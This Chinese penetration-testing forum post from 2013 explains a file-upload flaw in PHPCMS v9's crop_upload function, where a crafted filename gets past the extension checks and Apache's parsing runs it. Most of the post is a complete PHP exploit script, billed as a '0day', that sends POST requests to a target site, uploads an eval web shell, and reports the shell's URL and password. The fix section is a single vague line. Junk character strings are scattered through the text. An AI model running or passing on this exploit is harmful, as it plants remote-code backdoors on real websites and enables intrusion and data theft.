中国网络渗透测试联盟
标题:
PHPCMS v9 Getshell
[打印本页]
作者:
admin
时间:
2013-3-7 13:06
标题:
PHPCMS v9 Getshell
漏洞类型: 文件上传导致任意代码执行
" L8 {- j. Q) @( |4 d2 ]! m
3 a; E7 O6 V$ [9 q' y3 N+ ?; y
简要描述:
( ~% x+ k' b& o0 v$ G
. o( l& B* H( x- j
phpcms v9 getshell (apache)
$ w& ~7 @( X$ f1 q3 {- E3 }
详细说明:
8 x/ n4 B5 L% C" }( y7 i) o, ^
8 ?' h4 {, g6 P: D1 P9 d6 B! [
漏洞文件:phpcms\modules\attachment\attachments.php
$ C% l" u3 ?! N0 A8 g" O
/ f x2 F9 L! B$ K- z( V
public function crop_upload() { (isset($GLOBALS["HTTP_RAW_POST_DATA"])) { $pic = $GLOBALS["HTTP_RAW_POST_DATA"]; if (isset($_GET['width']) && !empty($_GET['width'])) { $width = intval($_GET['width']); } if (isset($_GET['height']) && !empty($_GET['height'])) { $height = intval($_GET['height']); } if (isset($_GET['file']) && !empty($_GET['file'])) { $_GET['file'] = str_replace(';','',$_GET['file']);//过滤了分号 if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();//is_image()检测是个关键 if (strpos($_GET['file'], pc_base::load_config('system', 'upload_url'))!==false) { $file = $_GET['file']; $basenamebasename = basename($file);//获取带有后缀的文件名 if (strpos($basename, 'thumb_')!==false) { $file_arr = explode('_', $basename); $basename = array_pop($file_arr); } $new_file = 'thumb_'.$width.'_'.$height.'_'.$basename; } else { pc_base::load_sys_class('attachment','',0); $module = trim($_GET['module']); $catid = intval($_GET['catid']); $siteid = $this->get_siteid(); $attachment = new attachment($module, $catid, $siteid); $uploadedfile['filename'] = basename($_GET['file']); $uploadedfile['fileext'] = fileext($_GET['file']); if (in_array($uploadedfile['fileext'], array('jpg', 'gif', 'jpeg', 'png', 'bmp'))) { $uploadedfile['isimage'] = 1; } $file_path = $this->upload_path.date('Y/md/'); pc_base::load_sys_func('dir'); dir_create($file_path); $new_file = date('Ymdhis').rand(100, 999).'.'.$uploadedfile['fileext']; $uploadedfile['filepath'] = date('Y/md/').$new_file; $aid = $attachment->add($uploadedfile); } $filepath = date('Y/md/'); file_put_contents($this->upload_path.$filepath.$new_file, $pic);//文件名可控、$pic可控 } else { return false; } echo pc_base::load_config('system', 'upload_url').$filepath.$new_file; exit; } }
! N. D% E1 p" o7 Z) z
后缀检测:phpcms\modules\attachment\functions\global.func.php
( n* p4 n- I! |$ w* c) h% Y
. S7 j) Y$ o- D2 A+ v
: z6 O) t! Z0 X8 H6 @% V* `
& t2 E/ a$ H+ ^( ^* z0 w( g& _
function is_image($file) { $ext_arr = array('jpg','gif','png','bmp','jpeg','tiff'); $ext = fileext($file);关键地方 return in_array($ext,$ext_arr) ? $ext_arr :false; }
% O" t; \6 B8 ~% F* q3 F; r2 Q
& W3 M% `8 F: j6 r0 G/ T/ T
关键函数:
0 E# Q0 b b& H2 Z
* O- Z5 T6 F( q5 B* h; X8 z
: U' X1 K ^9 l! c: O" {
$ n$ |! Y1 i" O4 o/ u3 U
function fileext($filename) { return strtolower(trim(substr(strrchr($filename, '.'), 1, 10))); }
0 O$ S/ A4 Q- {2 m$ `& p) X
) T ]9 ?9 x2 y4 R* O) x* ?
Fileext函数是对文件后缀名的提取。
2 O2 V9 B" y+ u% T$ i- n
根据此函数我们如果上传文件名为ddd.Php.jpg%20%20%20%20%20%20%20Php
8 P5 b. P, a2 T' e2 l1 y: z
经过此函数提取到的后缀还是jpg,因此正在is_image()函数中后缀检测被绕过了。
& s' b1 d) _- u$ M2 j) }
我们回到public function crop_upload() 函数中
- s7 C& D, l& u- \/ n( i4 g' u3 V
if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();
$ C" v4 E+ W! P9 p
在经过了is_image的判断之后又来了个.php的判断,在此程序员使用的是strpos函数
) S3 M# I1 c+ Z' @0 z9 Q
这个函数是对大小写敏感的函数我们使用.Php就可以直接绕过了。
3 z4 H+ E- _; C, `
经过上边的两层的过滤我们的ddd.Php.jpg%20%20%20%20%20%20%20Php后缀依然有效。
. n1 ?; ?& n1 S$ Z" D4 b2 x
最后$basename变量的值就为ddd.Php.jpg%20%20%20%20%20%20%20Php 然后使用file_put_contents函数写入到了指定目录。
2 c. p" c. W. {0 K
看见ddd.Php.jpg%20%20%20%20%20%20%20Php这个后缀,大家应该明白了,它用在apache搭建的服务器上可以被解析。
( Z ^2 ]2 Y) |4 a' {5 ]
漏洞证明:
' h( Z! \4 e2 a6 e
; P2 R5 N1 a, c
exp:
7 a6 k0 K* S' R z, ?
* `" U) ]6 U; V4 D. [* V* Q2 I$ d
<?php
4 Z) w! G( g4 O; d, w
error_reporting(E_ERROR);
6 q i6 D8 R2 X6 }) ^* a3 d1 Q
set_time_limit(0);
1 n! i) D9 j2 N6 c; D2 _
$pass="ln";
6 ]# Z( W$ y) t6 x1 p
print_r('
9 R4 S1 D6 Z% F/ B: ?
+---------------------------------------------------------------------------+
/ T. e: Z" t5 M1 x, A \
PHPCms V9 GETSHELL 0DAY
0 v7 \, w: R- M, a) O8 R2 g5 Z
code by L.N.
# @4 [0 i+ W- n3 R8 R7 I9 `8 J8 `
0 a0 Q" F, Q1 j7 R2 U( e! X2 d# _
apache 适用(利用的apache的解析漏洞) // 云安全
www.yunsec.net
( k; |8 b. n7 K( u. ^
+---------------------------------------------------------------------------+
" x- h, l q0 p' \( `
');
. q2 C, L6 |# q6 S2 i
if ($argc < 2) {
G& r) d7 j! Y8 D( V8 G' V& p$ A
print_r('
& o( }" j; } |- y
+---------------------------------------------------------------------------+
( v9 D7 x. H1 s! K! i
Usage: php '.$argv[0].' url path
# k8 ]# L; N: U- d
* y. w) A6 h/ J* c
Example:
$ E' [! ?2 j4 ^4 ]6 ]3 L+ {
1.php '.$argv[0].' lanu.sinaapp.com
; U6 R( W l o h! J( e: [
2.php '.$argv[0].' lanu.sinaapp.com /phpcms
7 _7 y1 S5 I1 V2 H5 t
+---------------------------------------------------------------------------+
. V4 c- X0 T$ f# i+ f; y
');
& C3 r# s* p) D5 r0 _
exit;
! I- S- ?1 u# W% D
}
1 c( R) v" Z @) l0 X9 ^: s
$ g* a8 T. j- r6 W) n" i# `* g6 |% f
$url = $argv[1];
$ P( b% l7 ^8 X: l
$path = $argv[2];
* Q' P( ^' Y Z3 e
$phpshell = '<?php @eval($_POST[\''.$pass.'\']);?>';
* g; u* E9 e+ R5 g
$file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';
% Y6 G+ V9 ^3 ~* K/ G
if($ret=Create_dir($url,$path))
3 O3 s. T4 R J" U0 Y
{
~2 o2 y5 |$ Z7 j( o0 K8 O
//echo $ret;
2 E2 ~: I8 `) N- D% P
$pattern = "|Server:[^,]+?|U";
- G- k w0 X4 O* B$ I
preg_match_all($pattern, $ret, $matches);
$ ^8 G b$ K" x
if($matches[0][0])
: |) y4 q& ]: u/ i! L! k2 Q5 a
{
9 e; X* o3 Z5 r1 M! S
if(strpos($matches[0][0],'Apache') == false)
) \) ] O5 d j$ [ r. L2 }
{
9 V; ?8 r3 Z; U
echo "\n亲!此网站不是apache的网站。\n";exit;
6 C O( B H+ ^+ L0 c8 ^
}
" S+ ~6 n, f: N* S) n3 R/ p
}
# [; P t3 T( P& W% @
$ret = GetShell($url,$phpshell,$path,$file);
# V- ~* }" q }
$pattern = "|http:\/\/[^,]+?\.,?|U";
) d/ g* ^, f$ c* g
preg_match_all($pattern, $ret, $matches);
! D/ y! M3 U9 O( ^+ y# Z' c
if($matches[0][0])
8 Y, }6 \; {* G) l# }' q' `" C* ?& n
{
$ ^! P! m* N" I9 @, h1 ^1 B
echo "\n".'密码为: '.$pass."\n";
2 M/ a- c7 o: V7 ?9 ^
echo "\r\nurl地址: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
: N T. `( S9 X. P/ J' i3 ?
}
4 k/ N% ~% x3 {; J% b# ?
else
0 v4 p3 u$ c9 B! \5 S
{
' F( c' F+ u' D, `' @3 P
$pattern = "|\/uploadfile\/[^,]+?\.,?|U";
+ D4 N# i0 p* ?
preg_match_all($pattern, $ret, $matches);
" _) W8 k0 F: E6 i
if($matches[0][0])
& O6 O3 I( p) K6 t
{
) |& S1 |1 M0 J5 d: G3 f1 U& V
echo "\n".'密码为: '.$pass."\n";
: v& X" F7 t. o0 o# v: ]
echo "\r\nurl地址:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
$ f8 j( R0 C" \/ g5 f! g% Y X2 f0 k" c
}
7 \8 O9 `7 c! t" w6 e
else
! |1 D) c4 b+ X$ o+ ~; a
{
/ Y; }4 j- _) [0 _" ]
echo "\r\n没得到!\n";exit;
5 F. Z- |3 H* V- r
}
& W7 f8 T& A( a
}
) C- ~0 y `0 [9 W; u0 c
}
7 q1 T3 J0 C; c% ?7 w
) x4 n4 X$ `( Y2 g. U4 s
function GetShell($url,$shell,$path,$js)
* v& s5 W! m) h1 z5 j
{
8 R6 o% h. Q& j9 `( R
$content =$shell;
/ I. j% L6 n: ^" f% R! g
$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n";
7 a. r3 f* W' E6 O [
$data .= "Host: ".$url."\r\n";
0 j) p" Y1 Y# F4 T8 _
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
* L; O. ` r% [: K" \
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$ o# a# |: J4 @: a2 z w
$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
$ V7 B/ ?$ y# ~+ @' ^ c
$data .= "Connection: close\r\n";
3 N# o, k6 n' K& l b
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
6 y5 d8 X) f7 U' q1 W# G
$data .= $content."\r\n";
* e9 \2 s3 H2 E2 A
$ock=fsockopen($url,80);
6 W" t; ~+ A. R, v
if (!$ock)
2 b- F1 B; z) M; j* V
{
V: U2 B! j4 ?- w$ G$ N, m( ^& C' l
echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
3 R! k' n! |! u& S" l7 x5 G
}
8 Q, D$ u9 I; u- A- d' e C
else
% i1 C8 }$ Q4 A% O' L; {
{
2 s0 I6 J+ w$ D, d! L
fwrite($ock,$data);
) E I0 R. U, G2 Z, b) Q
$resp = '';
9 O) P0 w- P' p9 y9 v/ B$ ^ g
while (!feof($ock))
6 Z% ]- m% i9 y* Z' h* l0 G, m1 L1 U
{
4 P7 Q# S9 Z+ R, G1 ^
$resp.=fread($ock, 1024);
; L; Q" m/ W) n7 L. r- X5 ?
}
+ r% M$ P- d- G0 [
return $resp;
/ [' D0 [1 E O, g3 C% d! j2 q
}
2 Q8 B7 R" s7 A/ A$ t8 X6 ]
}
% F# ]) z/ a6 P. s1 {
P2 K5 \) i: x- k
function Create_dir($url,$path='')
+ M* ~ \( B; C
{
$ |5 a: u+ ~8 L
$content ='I love you';
* r. X) O) ]+ R h4 {" Y. v$ U
$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n";
- e$ Z: m5 E' N
$data .= "Host: ".$url."\r\n";
5 i9 P6 l/ A; Z% L4 |
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
/ {7 W% g. h2 Z! p& H$ {% x
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
% X) V3 w7 o5 C) ?3 D7 v2 C6 X) G2 H
$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
; o0 Y4 t/ [" z
$data .= "Connection: close\r\n";
7 `; G) z8 G: S1 M' Q+ @* @6 H! i/ V
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
}6 ]7 R$ d) `- o7 X+ C
$data .= $content."\r\n";
; i/ @' \" I* B4 g! K) e, A
$ock=fsockopen($url,80);
& l& ~2 j: N8 ]9 f) `
if (!$ock)
1 v- l+ t& c6 v- z" E2 S" u
{
. S T& }" b3 i( z; }; r6 M* i
echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
$ x3 `" U/ Y0 V/ H
}
* g3 M6 p5 j0 l/ T5 @4 R
fwrite($ock,$data);
) e% j* [9 ^3 D
$resp = '';
' h: h* ^' |+ u5 L% s
while (!feof($ock))
% \% C* {- D9 M% l
{
6 A" `$ d3 K5 J/ H# |: c
$resp.=fread($ock, 1024);
: C( R7 f# v# i6 W! ~4 h# g" H
}
( ]& }3 Q1 ], _+ ^
return $resp;
- W c o( T/ @+ |9 K
}
2 I% R# _8 A" z' U9 p$ [3 E$ t
?>
6 F( n2 w5 \3 f# V& W8 G T
8 u& @0 s( ^1 D
修复方案:
4 P9 i( P$ U" C2 W: v# e* U
4 [- a* N" \/ C5 T/ v% o; d
过滤过滤再过滤
4 S$ M0 f' \+ |+ E3 c* a: \$ m0 r% U
* |5 z5 x- {% z7 |' |4 @
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2